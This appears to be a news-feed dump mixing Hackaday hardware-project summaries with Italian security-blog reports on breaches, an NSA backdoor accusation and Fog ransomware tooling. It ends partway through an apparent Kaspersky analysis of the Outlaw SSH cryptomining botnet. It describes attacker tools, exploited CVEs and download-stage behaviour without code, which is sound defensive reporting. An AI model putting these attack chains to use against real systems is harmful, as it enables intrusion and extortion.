Previously [Glen] had created a similar system that featured buttons to turn the garden lights on or off, as nobody likes stumbling blindly through a dark garden after returning home. Rather than having to fumble around for a button, the system should detect when said rear gate is opened. This would send a notification to [Glen]’s phone as well as activate the garden lights if it’s dark outside.

Although using a reed relay switch seemed like an obvious solution to replace the buttons, holding it closed turned out to require too much power. After looking at a few commercial examples, he settled for a Hall effect sensor solution with the Ti DRV5032FB in a TO-92 package.

Whereas the average person would just have put in a PIR sensor-based solution, this Zigbee solution does come with a lot more smart home creds, and does not require fumbling around with a smartphone or yelling at a voice assistant to turn the garden lights on.

hackaday.com/2025/04/30/buildi…

Le backdoor come sappiamo sono ovunque e qualora presenti possono essere utilizzate sia da chi le ha richieste ma anche a vantaggio di chi le ha scoperte e questo potrebbe essere un caso emblematico su questo argomento.

​Durante i Giochi Asiatici Invernali del 2025 a Harbin, in Cina, si è verificato un grave incidente di cybersicurezza: le autorità cinesi hanno accusato la National Security Agency (NSA) degli Stati Uniti di aver orchestrato una serie di attacchi informatici mirati contro i sistemi informativi dell’evento e le infrastrutture critiche della provincia di Heilongjiang.

Secondo quanto riportato da MyDrivers, l’NSA avrebbe utilizzato tecniche avanzate per infiltrarsi nei sistemi basati su Windows, inviando pacchetti di dati criptati per attivare presunte backdoor preinstallate nei sistemi operativi Microsoft .​

Le indagini, condotte dal Centro Nazionale per la Risposta alle Emergenze di Virus Informatici e da esperti di sicurezza informatica, hanno rivelato che gli attacchi si sono concentrati su applicazioni specifiche, infrastrutture critiche e settori sensibili. Le tecniche impiegate includevano l’uso di vulnerabilità sconosciute, attacchi di forza bruta e scansioni mirate per individuare file sensibili. In totale, si sono registrati oltre 270.000 tentativi di intrusione, colpendo sistemi cruciali come quelli per la gestione delle informazioni dell’evento, la logistica e la comunicazione .​

Un aspetto particolarmente preoccupante è stato l’invio di dati criptati a dispositivi Windows nella regione, presumibilmente per attivare backdoor integrate nel sistema operativo. Questa scoperta solleva interrogativi sulla sicurezza dei sistemi informatici e sulla possibilità che esistano vulnerabilità intenzionalmente lasciate aperte nei software commerciali.​

Le autorità cinesi hanno identificato tre agenti della NSA e due istituzioni accademiche statunitensi come responsabili degli attacchi, emettendo mandati di cattura internazionali. Questo episodio ha intensificato le tensioni tra Cina e Stati Uniti nel campo della cybersicurezza, evidenziando la crescente importanza della protezione delle infrastrutture digitali in eventi di rilevanza internazionale.​

La comunità internazionale è ora chiamata a riflettere sulla necessità di stabilire norme e accordi per prevenire simili attacchi in futuro. La cooperazione tra nazioni e la trasparenza nello sviluppo e nella gestione dei sistemi informatici diventano fondamentali per garantire la sicurezza e la fiducia nel cyberspazio.​

In conclusione, l’incidente di Harbin rappresenta un campanello d’allarme sulla vulnerabilità delle infrastrutture digitali e sull’urgenza di affrontare le minacce cibernetiche con strategie coordinate e proattive a livello globale.

L'articolo La Cina Accusa la NSA di aver usato Backdoor Native su Windows per hackerare i Giochi Asiatici proviene da il blog della sicurezza informatica.

There are a lot of distractions in daily life, especially with all the different forms of technology and their accompanying algorithms vying for our attention in the modern world. [mar1ash] makes the same observation about our shared experiences fighting to stay sane with all these push notifications and alerts, and wanted something a little simpler that can just tell time and perhaps a few other things. Enter the time brick.

The time brick is a simple way of keeping track of the most basic of things in the real world: time and weather. The device has no buttons and only a small OLED display. Based on an ESP-01 module and housed in a LEGO-like enclosure, the USB-powered clock sits quietly by a bed or computer with no need for any user interaction at all. It gets its information over a Wi-Fi connection configured in the code running on the device, and cycles through not only time, date, and weather but also a series of pre-programmed quotes of a surreal nature, since part of [mar1ash]’s goals for this project was to do something just a little bit outside the norm.

There are a few other quirks in this tiny device as well, including animations for the weather display, a “night mode” that’s automatically activated to account for low-light conditions, and the ability to easily handle WiFi drops and other errors without crashing. All of the project’s code is also available on its GitHub page. As far as design goes, it’s an excellent demonstration that successful projects have to avoid feature creep, and that doing one thing well is often a better design philosophy than adding needless complications.

hackaday.com/2025/04/29/back-t…

The future of healthy indoor plants, courtesy of AI. (Credit: [Liam])Like so many of us, [Liam] has a big problem. Whether it’s the curse of Brown Thumbs or something else, those darn houseplants just keep dying despite guides always telling you how incredibly easy it is to keep them from wilting with a modicum of care each day, even without opting for succulents or cactuses. In a fit of despair [Liam] decided to pin his hopes on what we have come to accept as the Savior of Humankind, namely ‘AI’, which can stand for a lot of things, but it’s definitely really smart and can even generate pretty pictures, which is something that the average human can not. Hence it’s time to let an LLM do all the smart plant caring stuff with ‘PlantMom’.

Since LLMs (so far) don’t come with physical appendages by default, some hardware had to be plugged together to measure parameters like light, temperature and soil moisture. Add to this a grow light & a water pump and all that remained was to tell the LMM using an extensive prompt (containing Python code) what it should do (keep the plant alive) and what responses (Python methods) are available. All that was left now was to let the ‘AI’ (Google’s Gemma 3) handle it.

To say that this resulted in a dramatic failure along with what reads like an emotional breakdown (on the side of the LLM) would be an understatement. The LLM insisted on turning the grow light on when it should be off and had the most erratic watering responses imaginable based on absolutely incorrect interpretations of the ADC data (flipping dry vs wet). After this episode the poor chili plant’s soil was absolutely saturated and is still trying to dry out, while the ongoing LLM experiment (with empty water tank) has the grow light blasting more often than a weed farm.

So far it seems like that the humble state machine’s job is still safe from being taken over by ‘AI’, and not even brown thumb folk can kill plants this efficiently.

hackaday.com/2025/04/29/compar…

A quadrature encoder provides a way to let hardware read movement (and direction) of a shaft, and they can be simple, effective, and inexpensive devices. But [Paulo Marques] observed that when it comes to reading motor speeds with them, what works best at high speeds doesn’t work at low speeds, and vice versa. His solution? PicoEncoder is a library providing a lightweight and robust method of using the Programmable I/O (PIO) hardware on the RP2040 to get better results, even (or especially) from cheap encoders, and do it efficiently.
The results of the sub-step method (blue) resemble a low-pass filter, but is delivered with no delay or CPU burden.
The output of a quadrature encoder is typically two square waves that are out of phase with one another. This data says whether a shaft is moving, and in what direction. When used to measure something like a motor shaft, one can also estimate rotation speed. Count how many steps come from the encoder over a period of time, and use that as the basis to calculate something like revolutions per minute.

[Paulo] points out that one issue with this basic method is that the quality depends a lot on how much data one has to work with. But the slower a motor turns, the less data one gets. To work around this, one can use a different calculation optimized for low speeds, but there’s really no single solution that handles high and low speeds well.

Another issue is that readings at the “edges” of step transitions can have a lot of noise. This can be ignored and assumed to average out, but it’s a source of inaccuracy that gets worse at slower speeds. Finally, while an ideal encoder has individual phases that are exactly 50% duty cycle and exactly 90 degrees out of phase with one another. This is almost never actually the case with cheaper encoders. Again, a source of inaccuracy.

[Paulo]’s solution was to roll his own method with the RP2040’s PIO, using a hybrid approach to effect a “sub-step” quadrature encoder. Compared to simple step counting, PicoEncoder more carefully tracks transitions to avoid problems with noise, and even accounts for phase size differences present in a particular encoder. The result is a much more accurate calculation of motor speed and position without any delays. Most of the work is done by the PIO of the RP2040, which does the low-level work of counting steps and tracking transitions without any CPU time involved. Try it out the next time you need to read a quadrature encoder for a motor!

The PIO is one of the more interesting pieces of functionality in the RP2040 and it’s great to see it used in a such a clever way. As our own Elliot Williams put it when he evaluated the RP2040, the PIO promises never having to bit-bang a solution again.

hackaday.com/2025/04/29/read-m…

On a Commodore 64, the computer is normally connected to a monitor with one composite video cable and to an audio device with a second, identical (although uniquely colored) cable. The signals passed through these cables are analog, each generated by a dedicated chip on the computer. Many C64 users may have accidentally swapped these cables when first setting up their machines, but [Matthias] wondered if this could be done purposefully — generating video with the audio hardware and vice versa.

Getting an audio signal from the video hardware on the Commodore is simple enough. The chips here operate at well over the needed frequency for even the best audio equipment, so it’s a relatively straightforward matter of generating an appropriate output wave. The audio hardware, on the other hand, is much less performative by comparison. The only component here capable of generating a fast enough signal to be understood by display hardware of the time is actually the volume register, although due to a filter on the chip the output is always going to be a bit blurred. But this setup is good enough to generate large text and some other features as well.

There are a few other constraints here as well, namely that loading the demos that [Matthias] has written takes so long that the audio can’t be paused while this happens and has to be bit-banged the entire time. It’s an in-depth project that shows mastery of the retro hardware, and for some other C64 demos take a look at this one which is written in just 256 bytes.

youtube.com/embed/_Orvsms7Ils?…

Thanks to [Jan] for the tip!

hackaday.com/2025/04/29/crossi…

Il 25 febbraio 2025 WindTre ha rilevato un accesso non autorizzato ai sistemi informatici utilizzati dai propri rivenditori.

L’intrusione, riconosciuta come un’azione malevola, è stata fortunatamente circoscritta a un singolo punto vendita. L’azienda, in linea con la normativa vigente, ha immediatamente informato le autorità competenti e ha proceduto a mettere in sicurezza il sistema compromesso.

Le indagini interne condotte da WindTre hanno permesso di stabilire che l’incidente ha comportato la visualizzazione e, in alcuni casi, la possibile esfiltrazione di dati personali comuni. Tra le informazioni potenzialmente compromesse si annoverano dati anagrafici quali nome, cognome, indirizzo e recapiti. L’azienda ha precisato che, anche se l’evento è stato contenuto, non si può escludere che anche i dati di alcuni clienti siano stati coinvolti.

A fronte dell’accaduto, WindTre ha ribadito il proprio impegno nella protezione dei dati personali, dichiarando di aver immediatamente adottato misure aggiuntive per prevenire il ripetersi di episodi simili. Tra queste, l’introduzione di tecnologie più avanzate per la sicurezza informatica.

L’azienda invita i propri clienti a mantenere alta l’attenzione rispetto a comunicazioni sospette ricevute via telefono, SMS, email o WhatsApp. Viene inoltre raccomandato di monitorare eventuali profili falsi sui social network. Un altro suggerimento utile riguarda la creazione di password “forti”, che seguano criteri minimi di complessità.

WindTre ha messo a disposizione diversi canali di assistenza per fornire supporto ai clienti potenzialmente coinvolti. È possibile contattare il servizio clienti al numero 159, scrivere al Data Protection Officer all’indirizzo dedicato (dataprotectionofficer@windtre.it) oppure chiamare il numero verde 800591854, attivo tutti i giorni dalle 10:00 alle 19:00, per ricevere chiarimenti o segnalare eventuali anomalie.

La comunicazione rientra nelle disposizioni previste dall’articolo 34 del Regolamento Europeo sulla protezione dei dati personali (GDPR), che obbliga i titolari del trattamento a informare tempestivamente gli interessati in caso di violazioni che possano comportare un rischio elevato per i loro diritti e le loro libertà.

L'articolo WindTre comunica un DataBreach che ha coinvolto i sistemi dei rivenditori proviene da il blog della sicurezza informatica.

It’s not unusual for redundant satellites, rocket stages, or other spacecraft to re-enter the earth’s atmosphere. Usually they pass unnoticed or generate a spectacular light show, and very rarely a few pieces make it to the surface of the planet. Coming up though is something entirely different, a re-entry of a redundant craft in which the object in question might make it to the ground intact. To find out more about the story we have to travel back to the early 1970s, and Kosmos-482. It was a failed Soviet Venera mission, and since its lander was heavily over-engineered to survive entry into the Venusian atmosphere there’s a fascinating prospect that it might survive Earth re-entry.
This model of the earlier Venera 7 probe shows the heavy protection to survive entry into the Venusian atmosphere. Emerezhko, CC BY-SA 4.0.
At the time of writing the re-entry is expected to happen on the 10th of May, but as yet due to its shallow re-entry angle it is difficult to predict where it might land. It is thought to be about a metre across and to weigh just under 500 kilograms, and its speed upon landing is projected to be between 60 and 80 metres per second. Should it hit land rather than water then, its remains are thought to present an immediate hazard only in its direct path.

Were it to be recovered it would be a fascinating artifact of the Space Race, and once the inevitable question of its ownership was resolved — do marine salvage laws apply in space? –we’d expect it to become a world class museum exhibit. If that happens, we look forward to bringing you our report if possible.

This craft isn’t the only surviving relic of the Space Race out there, though it may be the only one we have a chance of seeing up-close. Some of the craft from that era are even still alive.

Header: Moini, CC0.

hackaday.com/2025/04/29/theres…

Hitachi Vantara, una sussidiaria della multinazionale giapponese Hitachi, è stata costretta a disattivare i propri server durante il fine settimana per contenere l’attacco ransomware Akira.

Hitachi Vantara fornisce servizi di archiviazione dati, sistemi infrastrutturali, gestione del cloud computing e ripristino da ransomware. Collabora con agenzie governative e con i più grandi marchi del mondo, tra cui BMW, Telefónica, T-Mobile e China Telecom.

Secondo Bleeping Computer, Hitachi Vantara ha riconosciuto di aver subito un attacco ransomware e ha affermato di aver incaricato esperti di sicurezza informatica esterni di indagare sull’incidente e di essere al lavoro per ripristinare la funzionalità di tutti i sistemi interessati.

“Il 26 aprile 2025, Hitachi Vantara è stata vittima di un attacco ransomware che ha causato l’interruzione di alcuni dei nostri sistemi”, ha affermato Hitachi Vantara. — Dopo aver rilevato attività sospette, abbiamo immediatamente attivato protocolli di risposta agli incidenti e coinvolto esperti terzi in materia per condurre un’indagine e attenuare le conseguenze. Inoltre, per contenere l’incidente, abbiamo preventivamente disattivato i nostri server.”

Sebbene l’azienda non abbia attribuito l’attacco a nessun gruppo di hacker specifico, i giornalisti hanno riferito che dietro l’attacco c’è il gruppo Akira. La fonte stessa della pubblicazione, a conoscenza della situazione, ha riferito che gli hacker hanno rubato file dalla rete Hitachi Vantara e hanno lasciato richieste di riscatto sui computer hackerati.

È stato inoltre segnalato che, sebbene i servizi cloud dell’azienda non siano stati colpiti, i sistemi Hitachi Vantara e Hitachi Vantara Manufacturing sono stati disattivati ​​durante i lavori di localizzazione dell’attacco. Allo stesso tempo, i clienti con ambienti self-hosted possono accedere ai propri dati come di consueto.

Un’altra fonte ha riferito alla pubblicazione che l’attacco ha colpito una serie di progetti non specificati appartenenti a organizzazioni governative.

Il gruppo di hacker Akira è attivo da marzo 2023. Nel corso degli anni, il gruppo ha elencato oltre 300 organizzazioni sul suo sito di data dump e ha preso di mira numerose aziende e istituzioni di alto profilo, tra cui la Stanford University e Nissan (in Australia e Nuova Zelanda).

Secondo l’FBI, ad aprile 2024, Akira aveva compromesso più di 250 organizzazioni e riscosso più di 42 milioni di dollari in riscatti dalle sue vittime.

L'articolo Hitachi Vantara colpita da ransomware: i server spenti per fermare Akira proviene da il blog della sicurezza informatica.

If you’ve only been around for the Internet age, you may not realize that Hackaday is the successor of electronics magazines. In their heyday, magazines like Popular Electronics, Radio Electronics, and Elementary Electronics brought us projects to build. Hacks, if you will. Just like Hackaday, not all readers are at the same skill level. So you’d see some hat with a blinking light on it, followed by some super-advanced project like a TV typewriter or a computer. Or a picture phone.

In 1982, Radio Electronics, a major magazine of the day, showed plans for building a picture phone. All you needed was a closed-circuit TV camera, a TV, a telephone, and about two shoeboxes crammed full of parts.

Like many picture phones of its day, it was stretching the definition a little. It actually used ham radio-style slow scan TV (SSTV) to send a frame of video about once every eight seconds. That’s not backwards. The frame rate was 0.125 Hz. And while the resulting 128 x 256 image would seem crude today, this was amazing high tech for 1982.

Slow Scan for the Win

Hams had been playing with SSTV for a long time. Early experiments used high-persistence CRTs, so you’d see the image for as long as the phosphor kept glowing. You also had to sit still for the entire eight seconds to send the picture.

It didn’t take long for hams to take advantage of modern circuits to capture the slow input and convert it to a normal TV signal for as long as you wanted, and that’s what this box does as well. Early “scan converters” used video storage tubes that were rejects (because a perfect new one might have cost $50,000). However, cheap digital memory quickly replaced these storage tubes, making SSTV more practical and affordable.
One of Mitsubishi’s Picture Phones
Still, it never really caught on for telephone networks. A few years later, a few commercial products offered similar tech. Atari made a phone that was bought up by Mitsubishi and sold as the Luna, for example, around 1986. Mitsubishi, Sony, and others tried, unsuccessfully, to get the market to accept these slow picture phones. Between the cost of making a call and a minimum of $400 to buy one, though, it was a hard sell.

You might think this sounds like a weekend project with a Pi-Cam, and you are probably right if you did it now. But in 1982, the amount of work it took to make this work was significant. It helped that it used MM5280 dynamic RAM chips, which held a whopping 4,096 bits (not bytes) of memory. The project needed 16 of the chips, which, at the time, were about $5 each. Remember that $80 in those days was a lot more than $80 today, and you had to buy the rest of the parts, the camera (the article estimates that’s $150, alone), and so on. This wasn’t a poor high school student project.

Robot Kits

You could buy entire kits or just key parts, which was a common thing for magazines to do in those days. The kits came from Robot Research, which was known for making SSTV equipment for hams, so it makes sense that they knew how to do this. The author mentions that “this project is not for beginners.” He explains there are nearly 100 ICs on a “tightly-packed double-sided PC board.”

The device had two primary inputs: fast scan from the camera and slow scan from the phone line. Both could be digitized and stored in the memory array. The memory can also output fast scan TV for the monitor or slow scan for the phone line. Obviously, the system was half duplex. If you were sending a picture, you wouldn’t expect to receive a picture at the same time.
This is just the main board!
The input conversion is done with comparators for speed. Luckily, the conversion is only four bits of monochrome, so you only need 16 (IC73-80) to get the job done. The memory speed was also a concern. Each memory chip’s enable line activated while the previous chip’s was half way through with a cycle.

Since there is no microcontroller, the design includes plenty of gates, op amps, bipolar transistors, and the like. The adjacent picture shows just the device’s main board!

Lots of Parts

If you want to dig into the details, you’ll also want to look at part 2. There’s more theory of operation there and the parts list. The article notes that you could record the tones to a cassette tape for later playback, but that you’d “probably need a device from your local phone company to couple the Picture Phone to their lines.” Ah, the days of the DAA.

They even noted in part 2 that connecting a home-built Picture Phone directly to the phone lines was illegal, which was true at the time. Part 3 talks even more about the phone interface (and, that same issue has a very cool roundup of all the computers you could buy in 1982, ranging from $100 to $6,000). Part 4 was all about alignment and yet more about the phone interface.

Alignment shouldn’t have been too hard. The highest tone on the phone line was 2,300 Hz. While there are many SSTV standards today for color images, this old-fashioned scheme was simple: 2,300 Hz for white and 1,500 Hz for black. A 1,200 Hz tone provided sync signals. Interestingly, sharp jumps in color could create artifacts, so the converters use a gray code to minimize unnecessary sharp jumps in value.

The Phone Book

It wouldn’t make sense to make only one of these, so we wonder how many pairs were built. The magazine did ask people to report if they had one and intended to publish a picture phone directory. We don’t know if that ever happened, but given what a long-distance phone call cost in 1982, we imagine that idea didn’t catch on.

The video phone was long a dream, and we still don’t have exactly what people imagined. We would really like to replicate this picture phone on a PC using GNU Radio, for example.

hackaday.com/2025/04/29/the-di…

Continuous glucose meters (CGMs) aren’t just widgets for the wellness crowd. For many, CGMs are real-time feedback machines for the body, offering glucose trendlines that help people rethink how they eat. They allow diabetics to continue their daily life without stabbing their fingertips several times a day, in the most inconvenient places. This video by [Becky Stern] is all about comparing two of the most popular continuous glucose monitors (CGMs): the Abbott Libre 3 and the Dexcom G7.

Both the Libre 3 and the G7 come with spring-loaded applicators and stick to the upper arm. At first glance they seem similar, but the differences run deep. The Libre 3 is the minimalist of both: two plastic discs sandwiching the electronics. The G7, in contrast, features an over-molded shell that suggests a higher production cost, and perhaps, greater robustness. The G7 needs a button push to engage, which users describe as slightly clumsy compared to the Libre’s simpler poke-and-go design. The nuance: G7’s ten-day lifespan means more waste than the fourteen-day Libre, yet the former allows for longer submersion in water, if that’s your passion.

While these devices are primarily intended for people with diabetes, they’ve quietly been adopted by a growing tribe of biohackers and curious minds who are eager to explore their own metabolic quirks. In February, we featured a dissection of the Stelo CGM, cracking open its secrets layer by layer.

youtube.com/embed/6ZTcJdSd2Rk?…

hackaday.com/2025/04/29/peekin…

Don’t you love it when the title track is the first one on the album? I had to single out this adjustable keyboard called the Protractor, because look at it! The whole thing moves, you know. Go look at the gallery.

Image by [BFB_Workshop] via redditIf you use a true split, even if you never leave the house, you know the pain of losing the good angle and/or separation you had going on for whatever reason. Not only does this monoblock split solve that simply by being a monoblock split, you can always find the right angle you had via the built-in angle finder.

[BFB_Workshop] used a nice!nano v2, but you could use any ZMK-supported board with the same dimensions. This 5 x 12 has 60 Gateron KS-33 switches, which it was made for, and has custom keycaps. You can, of course, see all the nice, neat ribbon cable wiring through the clear PLA, which is a really great touch.

This bad boy is flat enough that you can use the table as your palm rest. To me, that doesn’t sound so comfortable, but then again, I like key wells and such. I’d still love to try a Protractor, because it looks quite interesting to type on. If you want to build one, the files and instructions are available on Printables.

Present Arms: the AR-60%

Image by [Sli22ard] via redditYes I stole that joke, sort of. Don’t shoot! Anyway, as [Sli22ard] asks, does your keyboard have a mil-spec stock? I’m guessing no, although you might have a knife nearby. I myself have a fancy-handled butter knife for opening mail.

This is [Sli22ard]’s latest “abomination”, and the best part is that the MOE fixed carbine stock folds up so that the whole thing fits on the ever-important keyboard display. (Click to the second picture and be sure to admire the Dreamcast that was in storage for however long.)

The case is a Keysme Pic60, custom Cerakoted, with a 4pplet waffling60 PCB within its walls. That case is meant to have things hanging off the upper left corner, so that must have been a great place to start as far as connecting up the stock.

[Sli22ard] used Gateron Type R switches and a NovelKeys Cream Arc switch for the Spacebar. Most of the keycaps are GMK Striker, with the 10u Spacebar from Awekeys.

I particularly like the midnight-y keycaps along with that monster gold Spacebar. [Sli22ard] says it thocks like nobody’s business, and I believe it.

The Centerfold: the Quiet Type

Image by [Pleasant_Dot_189] via reddit[Pleasant_Dot_189] sure has a pleasant research-only battlestation, don’t they? Sure, there are four screens, but there’s no RGB, and the only plant can safely be ignored for weeks at a time. Why four screens? This way, [Pleasant_Dot_189] doesn’t have to switch between tasks or tabs and can just write as they work on their fifth book.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Malling-Hansen Takygraf

The astute among you will remember that we’ve covered the Malling-Hansen Writing Ball, the more well-known offering from M-H. Well, this here is the Malling-Hansen Takygraf (or Takygraph, depending upon where you are in the world), and it was quite the writing machine. Only one was created, and its whereabouts are unknown.
Image via The Malling-Hansen Society
Rasmus Malling-Hansen’s intention was to create a typewriter that could type at the speed of human speech. And he succeeded — the Takygraf could reach speeds of 1200 characters per minute. He hoped the Takygraf would be used for stenography.

The VP of the Malling-Hansen Society describes the function of the Takygraf as follows: “The first Takygraf from 1872 was combined with a writing ball but the bottom of each piston forms a blunt point and so it forms only impressions in the paper. The paper band was prepared to conduct electricity. Under the paper band there were metal points which were connected to electromagnets. The form impressions in the paper band are brought in contact with the fixed metal points under the paper as the paper moves along and so the corresponding electromagnets are brought into action. When the electromagnets attracted the keepers, then the types made their impressions on the paper band (through the invention of a colored or carbonized strip of paper).

In the year 1874 follows a modified Takygraf combined with a writing ball but instead of the prepared paper (to conduct electricity) and the form impressions in the paper Rasmus Malling-Hansen developed a mechanical memory-unit, which contacts the electromagnets in the right time to make the needed type impressions on the paper band. It was possible to write with this brilliant invention as fast as we talk.”

Be sure to visit this fantastic model viewer of the Takygraph on your way out.

Finally, a Keyboard for Metalheads

Actually, the Cleaver is another aluminium keyboard, not the Icebreaker from a couple Keebins ago. But they’re from the same company, and the idea is basically the same. Aluminium wherever possible, and tiny, laser-cut holes that make up the legends. At least these are more legible.
Image by Serene Industries via Yanko Design
And, whereas the Icebreaker definitely doubled as bludgeoning device, the Cleaver is much slimmer and more streamlined. Both are machined from a single block of aluminium.

Much like its predecessor, the Cleaver is a Hall-effect keyboard, which I would really like to type on someday while I consider how they can never really wear out in the traditional switch sense.

Inside the metal block, the electronics are huddled away from its raw power inside of a silicone core. This is meant to enhance the typing acoustics, protect against dust, sweat, and coffee, and has the added effect of popping out the underside to be a nice, non-slip foot.

Unlike the Icebreaker, which started at $2100, the pre-order price for the Cleaver is a mere $850. And to get this one in black? Still just $850. I’m curious to know how much it weighs, since it’s much more portable-looking. The Cleaver would be an icebreaker for sure.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/04/29/keebin…

Negli ultimi anni, abbiamo assistito all’evoluzione incessante delle minacce cyber, che da semplici attacchi opportunistici si sono trasformati in operazioni altamente strutturate, capaci di colpire bersagli eterogenei su scala globale. L’ultimo caso degno di nota è quello descritto nel report pubblicato da The DFIR Report, che ci guida alla scoperta di un’infrastruttura malevola associata a un affiliato del gruppo Fog Ransomware.

Questa analisi rivela non solo le tecniche offensive impiegate, ma anche l’intelligenza e la pianificazione dietro l’intera catena di attacco, che ha coinvolto numerosi strumenti noti nel mondo del red teaming e dell’ethical hacking, piegati però a scopi criminali.

Origine dell’attacco: accesso iniziale tramite VPN compromessa

Il punto di partenza dell’intera operazione è riconducibile a un classico, ma sempre efficace, vettore di accesso iniziale: l’utilizzo di credenziali compromesse per connettersi a una SonicWall VPN esposta pubblicamente. In questo caso, non si parla di exploit di vulnerabilità zero-day, ma dell’abuso di password deboli o già trafugate e circolanti nel dark web. Ancora una volta, si conferma quanto la gestione delle credenziali e l’assenza di autenticazione multifattoriale siano tra i principali talloni d’Achille delle infrastrutture aziendali.

L’arsenale offensivo: strumenti noti, orchestrazione letale

Il contenuto dell’open directory scoperta – rivelatosi un vero e proprio toolkit offensivo – ha permesso agli analisti di ricostruire con estrema precisione le varie fasi dell’attacco. Gli strumenti rinvenuti, pur essendo noti e disponibili in contesti di test o formazione, sono stati qui utilizzati con finalità del tutto malevole:

• SonicWall Scanner: per l’individuazione automatizzata di dispositivi VPN esposti e potenzialmente vulnerabili.
• Sliver C2: una piattaforma Command & Control alternativa a Cobalt Strike, capace di gestire payload e comunicazioni crittografate, oltre a offrire strumenti di evasione e pivoting avanzati.
• DonPAPI: strumento pensato per estrarre credenziali dal Windows DPAPI, spesso sottovalutato ma estremamente efficace per recuperare segreti utente da browser e altri software.
• Certipy: specializzato nello sfruttamento delle vulnerabilità certificate-based presenti in Active Directory, come attacchi relaying su servizi di autenticazione.
• Zer0dump, noPac e Pachine: impiegati per escalation dei privilegi, attacchi relaying NTLM e abuso delle deleghe Kerberos, in particolare tramite combinazioni che coinvolgono le vulnerabilità CVE-2021-42278 e CVE-2021-42287.

Un elemento particolarmente interessante è l’impiego di AnyDesk, utilizzato come meccanismo di persistenza. Il software è stato distribuito e installato silenziosamente tramite PowerShell script preconfigurati, con l’obiettivo di mantenere l’accesso ai sistemi anche in caso di reboot o revoca delle credenziali.

Tecniche MITRE ATT&CK in uso

Il grafo relazionale allegato al report e qui riportato fornisce una rappresentazione visiva straordinariamente dettagliata dei collegamenti tra attori, tecniche, vulnerabilità e settori colpiti. Le tecniche impiegate coprono diverse fasi della kill chain:

Le vulnerabilità sfruttate

Gli attaccanti si sono avvalsi di tre vulnerabilità note, ma ancora ampiamente presenti in molte realtà aziendali:

• CVE-2021-42287: consente ad un utente autenticato di impersonare un altro account, specialmente in combinazione con exploit AD.
• CVE-2021-42278: abusa dei record DNS e dei nomi computer per ottenere escalation privilegi.
• CVE-2020-1472 (Zerologon): uno degli exploit più devastanti degli ultimi anni, consente di ottenere il controllo completo di un domain controller sfruttando l’algoritmo di autenticazione Netlogon.

Queste vulnerabilità, sebbene pubbliche da tempo, rappresentano un pericolo persistente a causa della lentezza di alcune organizzazioni nell’applicare patch o mitigazioni strutturate.

Target colpiti: una minaccia globale e trasversale

Il gruppo Fog Ransomware si distingue per l’ampiezza geografica e settoriale dei suoi bersagli. Il grafo mostra chiaramente l’attività mirata contro:

• Nazioni coinvolte:
  
  • 🇺🇸 Stati Uniti d’America
  • 🇮🇹 Italia
  • 🇧🇷 Brasile
  • 🇬🇷 Grecia

  
  

• Settori economici colpiti:
  
  • 🛒 Retail
  • 🎓 Education
  • 🖥️ Technology
  • 🚚 Transportation

  
  

Questa distribuzione evidenzia una strategia non opportunistica ma pianificata, basata su analisi di impatto, disponibilità delle superfici di attacco e, probabilmente, capacità di pagamento del riscatto.

Considerazioni finali

Ci troviamo di fronte a un caso emblematico in cui l’integrazione di strumenti noti (alcuni persino open source), l’automazione di task offensivi tramite scripting e l’uso di vulnerabilità non zero-day danno vita a una campagna ransomware efficace e su larga scala.

La professionalizzazione del cybercrime e l’accessibilità degli strumenti di attacco rendono necessaria una nuova consapevolezza da parte delle aziende. Non si tratta solo di aggiornare i sistemi, ma di ripensare completamente la propria postura di sicurezza:

• Messa in sicurezza dei controller di dominio e delle infrastrutture Active Directory
• Monitoraggio continuo delle anomalie tramite strumenti EDR e SIEM
• Segmentazione delle reti interne
• Disabilitazione dei protocolli obsoleti (come Netlogon non sicuro)
• MFA ovunque, incluso VPN e accessi remoti

Il gruppo Fog Ransomware ci ricorda che, nel mondo delle minacce informatiche, l’unica nebbia ammissibile è quella che avvolge gli attaccanti nei nostri sistemi di deception. Ma noi, oggi più che mai, dobbiamo vedere chiaro.

L'articolo Navigare nella Nebbia: analisi tecnica dell’operazione del ransomware Fog proviene da il blog della sicurezza informatica.

As transport infrastructure in Europe moves toward a zero-carbon future, there remain a number of railway lines which have not been electrified. The question of replacing their diesel traction with greener alternatives, and there are a few different options for a forward looking railway company to choose from. In Germany the Rhine-Main railway took delivery of a fleet of 27 Alstom hydrogen-powered multiple units for local passenger services, but as it turns out they have not been a success (German language, Google translation.). For anyone enthused as we are about alternative power, this bears some investigation.

It seems that this time the reliability of the units and the supply of spare parts was the issue, rather than the difficulty of fuel transport as seen in other failed hydrogen transport problems, but whatever the reason it seems we’re more often writing about hydrogen’s failures than its successes. We really want to believe in a hydrogen future in which ultra clean trains and busses zip around on hydrogen derived from wind power, but sadly that has never seemed so far away. Instead trains seem inevitably to be following cars, and more successful trials using battery units point the way towards their being the future.

We’re sure that more hydrogen transport projects will come and go before either the technological problems are overcome, or they fade away as impractical as the atmospheric railway. Meanwhile we’d suggest hydrogen transport as the example when making value judgements about technology.

hackaday.com/2025/04/29/hydrog…

Introduction

In a recent incident response case in Brazil, we dealt with a relatively simple, yet very effective threat focused on Linux environments. Outlaw (also known as “Dota”) is a Perl-based crypto mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Previous research ([1], [2]) described Outlaw samples obtained from honeypots. In this article, we provide details from a real incident contained by Kaspersky, as well as publicly available telemetry data about the countries and territories most frequently targeted by the threat actor. Finally, we provide TTPs and best practices that security practitioners can adopt to protect their infrastructures against this type of threat.

Analysis

We started the analysis by gathering relevant evidence from a compromised Linux system. We identified an odd authorized SSH key for a user called suporte (in a Portuguese-speaking environment, this is an account typically used for administrative tasks in the operating system). Such accounts are often configured to have the same username as the password, which is a bad practice, making it easy for the attackers to exploit them. The authorized key belonged to a remote Linux machine user called mdrfckr, a string found in Dota campaigns, which raised our suspicion.

Suspicious authorized key

After the initial SSH compromise, the threat actor downloads the first-stage script, tddwrt7s.sh, using utilities like wget or curl. This artifact is responsible for downloading the dota.tar.gz file from the attackers’ server. Below is the sequence of commands performed by the attacker to obtain and decompress this file, which is rather typical of them. It is interesting to note that the adversary uses both of the previously mentioned utilities to try to download the artifact, since the system may not have one or another.

Chain of commands used by the attackers to download and decompress dota.tar.gz

After the decompression, a hidden directory, named ".configrc5", was created in the user’s home directory with the following structure:

.configrc5 directory structure

